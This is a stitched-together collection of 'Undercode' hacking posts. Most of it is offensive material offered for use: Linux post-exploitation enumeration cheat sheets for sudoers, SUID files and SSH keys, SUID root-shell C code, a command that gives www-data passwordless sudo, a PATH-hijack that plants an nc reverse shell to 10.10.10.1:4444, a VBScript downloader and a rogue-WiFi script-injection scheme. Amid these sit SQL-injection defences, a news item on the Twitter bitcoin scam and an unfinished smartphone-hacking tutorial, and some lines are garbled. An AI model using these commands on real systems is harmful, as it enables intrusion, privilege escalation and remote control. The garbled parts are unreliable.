▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑DOM-based or local XSS-tutorial

Based on DOM or local XSS attacks. Generally, a free wifi is provided, but a gateway that provides free wifi will insert a script into any page you visit or directly return a phishing page, thereby implanting malicious scripts. This kind of direct existence on the page without returning through the server is a local XSS attack.

Example 1:

1. Provide a free wifi.

1. Start a special DNS service, resolve all domain names to our computer, and set the Wifi DHCP-DNS to our computer IP.

2. After the user connected to wifi opens any website, the request will be intercepted by us. We forward to the real server according to the host field in the http header.

3. After receiving the data returned by the server, we can inject the web script and return it to the user.

4. When the injected script is executed, the user's browser will preload the common script libraries of major websites in turn.

WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑User & Privilege Information linux :

Command Result

whoami Current username

id Current user information

cat /etc/sudoers Who’s allowed to do what as root – Privileged command

sudo -l Can the current user perform anything as root

sudo -l 2>/dev/null | grep -w 'nmap|

perl|'awk'|'find'|'bash'|'sh'|'man'

|'more'|'less'|'vi'|'vim'|'nc'|'netcat'|python

|ruby|lua|irb' | xargs -r ls -la 2>/dev/null
Can the current user run any ‘interesting’ binaries as root and if so also display the binary permissions etc.

Enjoy ❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Interesting linux Files:

Command Result

find / -perm -4000 -type f 2>/dev/null Find SUID files

find / -uid 0 -perm -4000 -type f 2>/dev/null Find SUID

files owned by root

find / -perm -2000 -type f 2>/dev/null Find GUID files

find / -perm -2 -type f 2>/dev/null Find world-writeable files

find / ! -path "/proc/" -perm -2 -type f -print 2>/dev/null
Find world-writeable files excluding those in /proc

find / -perm -2 -type d 2>/dev/null Find word-writeable directories

find /home –name .rhosts -print 2>/dev/null Find rhost config files

find /home -iname .plan -exec ls -la {} ; -exec cat {} 2>/dev/null ;

Find .plan files, list permissions and cat the file contents

find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null ; -exec cat {} 2>/dev/null ; Find hosts.equiv, list permissions and cat the file contents

ls -ahlR /root/ See if you can access other user directories to find interesting files

cat ~/.bash_history Show the current users’ command history

ls -la ~/.history Show the current users’ various history files

ls -la /root/.*history Can we read root’s history files

ls -la ~/.ssh/ Check for interesting ssh files in the current users’ directory

find / -name "iddsa*" -o -name "idrsa" -o -name "known_hosts"

-o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null |xargs -r ls -la Find SSH keys/host information

ls -la /usr/sbin/in. Check Configuration of inetd services

grep -l -i pass /var/log/.log 2>/dev/null Check log files for keywords (‘pass’ in this example) and show positive matches

find /var/log -type f -exec ls -la {} ; 2>/dev/null List files in specified directory (/var/log)

find /var/log -name .log -type f -exec ls -la {} ; 2>/dev/null

List .log files in specified directory (/var/log)


Enjoy ❤️👍🏻
✅github topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

malicious.link post snagging-creds-from-locked-machine #requested

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Linux commands for Service Information:

  Result

ps aux | grep root  View services running as root

ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'  Lookup process binary path and permissions

cat /etc/inetd.conf  List services managed by inetd

cat /etc/xinetd.conf  As above for xinetd

cat /etc/xinetd.conf 2>/dev/null | awk '{print $7}' |xargs -r ls -la 
2>/dev/null  A very ‘rough’ command to extract associated 
binaries from xinetd.conf and show permissions of each

ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null  Permissions and contents of /etc/exports (NFS)

🦑Jobs/Tasks:

Command  Result

crontab -l -u %username%  Display scheduled jobs for the specified user – Privileged command

ls -la /etc/cron*  Scheduled jobs overview (hourly, daily, monthly etc)

ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2>/dev/null  What can ‘others’ write in /etc/cron* directories
 

Enjoy ❤️👍🏻

✅github topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How manage ftp on kali Linux ?

1️⃣apt-get update && apt-get install pure-ftpd

2️⃣go to #!/bin/bash

3️⃣groupadd ftpgroup

4️⃣useradd -g ftpgroup -d /dev/null -s /etc ftpuser

5️⃣pure-pw useradd offsec -u ftpuser -d /ftphome

6️⃣pure-pw mkdb

7️⃣cd /etc/pure-ftpd/auth/

8️⃣ln -s ../conf/PureDB 60pdb

9️⃣mkdir -p /ftphome

🔟chown -R ftpuser:ftpgroup /ftphome/

1️⃣1️⃣/etc/init.d/pure-ftpd restart

Enjoy ❤️👍🏻
✅github topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 File Transfers

- Post exploitation refers to the actions performed by an attacker,
once some level of control has been gained on his target.

- Simple Local Web Servers

- Run a basic http server, great for serving up shells etc
python -m SimpleHTTPServer 80

- Run a basic Python3 http server, great for serving up shells
etc
python3 -m http.server

- Run a ruby webrick basic http server
ruby -rwebrick -e "WEBrick::HTTPServer.new
(:Port => 80, :DocumentRoot => Dir.pwd).start"

- Run a basic PHP http server
php -S $ip:80

- Creating a wget VB Script on Windows:
*https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt*

- Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line):

> echo Set args = Wscript.Arguments >> webdl.vbs
timeout 1

> echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs
timeout 1

> echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")

Enjoy ❤️👍🏻
✅github topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Linux commands for install programs :

Command Result

dpkg -l Installed packages (Debian)

rpm -qa Installed packages (Red Hat)

sudo -V Sudo version – does an exploit exist?

httpd -v Apache version

apache2 -v As above

apache2ctl (or apachectl) -M List loaded Apache
modules

mysql --version Installed MYSQL version details

psql -V Installed Postgres version details

perl -v Installed Perl version details

java -version Installed Java version details

python --version Installed Python version details

ruby -v Installed Ruby version details

find / -name %programname% 2>/dev/null (i.e. nc, netcat, wget,

nmap etc) Locate ‘useful’ programs (netcat, wget etc)

which %programname% (i.e. nc, netcat, wget, nmap etc) As above

dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc' 2>/dev/null| grep gcc 2>/dev/null List available compilers

cat /etc/apache2/envvars 2>/dev/null |grep -i 'user|group' |awk '{sub(/.export /,"")}1' Which account is Apache running as

Enjoy ❤️👍🏻
✅github topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑The initial stage of information collection is scanning.

What is investigation?
Reconnaissance is to collect as much information as possible on the target network. From a hacker's point of view, information collection is very helpful for attacks. Generally speaking, the following information can be collected:

Email, port number, operating system, running service, Traceroute or DNS information, firewall identification and escape, etc.

1️⃣Introduction to NMAP
Nmap is a network connection end scanning software, used to scan the open network connection end of the computer on the Internet. Determine which services are running on which connections, and infer which operating system the computer is running (this is also known as fingerprinting). It is one of the necessary software for network administrators and is used to evaluate network system security.

> NMAP script engine
The NMAP script engine is the most powerful and flexible feature of NMAP. It allows users to write simple scripts to automate various network tasks, basically these scripts are written in lua language. Usually NMAP's script engine can do many things, such as:

2️⃣Network discovery
This is the basic function of NMAP. Examples include finding the whois information of the target domain name, querying the ownership of the target ip on ARIN, RIPE, or APNIC, finding open ports, SNMP query and listing available NFS/SMB/RPC shares and services .

3️⃣Vulnerability detection
When a new vulnerability is discovered, you want to quickly scan the network to identify vulnerable systems before intruders. Although NMAP is not a comprehensive vulnerability scanner, NSE is powerful enough to handle demanding vulnerability checks. Many vulnerable scripts are already available, and more scripts are planned.

4️⃣Backdoor detection
Many attackers and some automated worms will leave back doors so that they can be re-entered later. Some of them can be detected by NMAP based on regular expressions.

5️⃣Exploit
As a scripting language, NSE can even exploit vulnerabilities, not just find them. The ability to add custom attack scripts may be valuable to some people (especially penetration testers), but it is not intended to develop NMAP into something like the metasploit framework.

Enjoy ❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑Local Privilege Escalation #Exploit in Linux

SUID (Set owner User ID up on execution)
Often SUID C binary files are required to spawn a shell as a
superuser, you can update the UID / GID and shell as required.\

1) SUID C Shell for /bin/bash

int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}

2) SUID C Shell for /bin/sh

int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}

3) Building the SUID Shell binary
gcc -o suid suid.c
For 32 bit:
gcc -m32 -o suid suid.c

4) Create and compile an SUID from a limited shell (no file transfer)

echo "int main(void){\nsetgid(0);\nsetuid(0);\nsystem(\"/bin/sh\");\n}" >privsc.c
gcc privsc.c -o privsc

5) Handy command if you can get a root user to run it. Add the www-data user to Root SUDO group with no password requirement:

> echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

6) You may find a command is being executed by the root user, you may be able to modify the system PATH environment variable
to execute your command instead. In the example below, ssh is replaced with a reverse shell SUID connecting to 10.10.10.1 on
port 4444.
set PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh
chmod +x ssh

Enjoy ❤️👍🏻
✅git 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Vulnerability solution

SQL injection vulnerability solutions:

1. The key to solving SQL injection vulnerabilities is to strictly check all data input from users and use the principle of least privilege for database configuration

2. All query statements use the parameterized query interface provided by the database, and the parameterized statements use parameters instead of embedding user input variables into the SQL statement.

 The special characters ('"\<>&*; etc.) entering the database are escaped or coded.

4. Confirm the type of each data. For example, numeric data must be numeric, and the storage field in the database must correspond to int type.

5. The data length should be strictly regulated, which can prevent the relatively long SQL injection statement from being executed correctly to a certain extent.

6. The encoding of each data layer of the website is unified. It is recommended to use UTF-8 encoding. Inconsistent upper and lower encoding may cause some filtering models to be bypassed.

7. Strictly restrict the operation authority of the website user's database, and provide this user with authority that can only satisfy his work, thereby minimizing the harm of injection attacks to the database.

8. Avoid websites displaying SQL error messages, such as type errors, field mismatches, etc., to prevent attackers from using these error messages to make some judgments.

9. Before the website is released, it is recommended to use some professional SQL injection detection tools to detect and patch these SQL injection vulnerabilities in time

WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

another reverse written tutorials

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Coinbase said it prevented more than 1,100 customers from trading with Twitter hackers
#news

> According to foreign media reports, cryptocurrency trading company Coinbase said that it recently prevented more than 1,100 customers from sending bitcoin to Twitter hackers. Last week, these hackers hijacked some well-known accounts to promote a Bitcoin scam. Philip Martin, Coinbase's chief information security officer, told Forbes that if Coinbase does not take this measure, these customers will send a total of 30.4 bitcoins (currently worth about $278,000) to hackers.

> It is worth noting that this amount is more than twice the actual amount ($121,000) collected by the hacker through the victim.

> Martin stated that despite Coinbase’s actions, 14 of its customers were still victims of the scam, and they sent hackers about $3,000 worth of Bitcoin before their addresses were blacklisted.

> The report shows that users of Gemini, Kraken and Binance have also tried to send bitcoin to these addresses, but the amount is not as large as Coinbase. All these exchanges acted immediately after the scam was exposed and blocked these addresses.

> It is reported that this widespread attack took place on Twitter on Wednesday local time in the United States. The celebrities affected include former US President Barack Obama, Microsoft co-founder Bill Gates and Tesla CEO Elon Musk. Wait.

> The blockchain analysis company claims that some stolen bitcoins have been transferred to some exchanges and mixed bitcoin merchants such as Wasabi Wallet.

> Tom Robinson, co-founder and chief scientist of Elliptic, told The Block: “We can see a very small amount of data flowing to a known, regulated encrypted exchange system.” However, for confidentiality reasons, he refused to disclose the name of the exchange. But Robinson further stated that 2.89 bitcoin (22% of the total amount) was sent to the mustard wallet.

> Another blockchain analysis company, Whitestream, told The Block that the address of one of the hackers had already conducted transactions with at least three cryptocurrency platforms. Itsik Levy, Co-founder and CEO of Whitestream, told The Block: "We can see that an address is connected to addresses related to several digital currency payment processors (CoinPayments, Coinbase, BitPay)."

> In fact, a BitPay spokesperson confirmed to The Block that in May 2020, one of its merchants remitted $25 from a Twitter hacker’s address, and as part of BitPay’s standard processes and procedures, they are remittances. The detailed information obtained risks to related parties including law enforcement agencies.

CoinPayments declined to comment on this matter, and Coinbase did not respond to a request for comment.

WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Hacking a smartphone using Kali-for beginers by undercode :

> Kali is a Linux flavored program used by hackers and security professionals. A very popular and irreplaceable item. I will not describe the pros and cons, but let's get down to business:

Step 1: Open Terminal

Of course, to get started, fire up Kali and open a terminal.

Step 2: Install the required libraries

To run these Android virtual devices on 64-bit Debian operating systems (such as Kali), we need to install a few key libraries that are not included by default. Fortunately, they are all in the Kali repository.

kali> apt-get install lib32stdc ++ 6 lib32ncurses5 lib32zl

Installing these three libraries is enough to get us going, we can now start installing the Android Software Developer Kit (SDK).

Step 3: Install Android SDK

From yo ur browser go to the "Android SDK" website and download the Android SDK installer. Make sure you download the Linux kit. You can download and install the Windows or Mac options and then test these virtual devices in Kali, but this will be a more complex option. Let's go the easy way and set everything in Kali.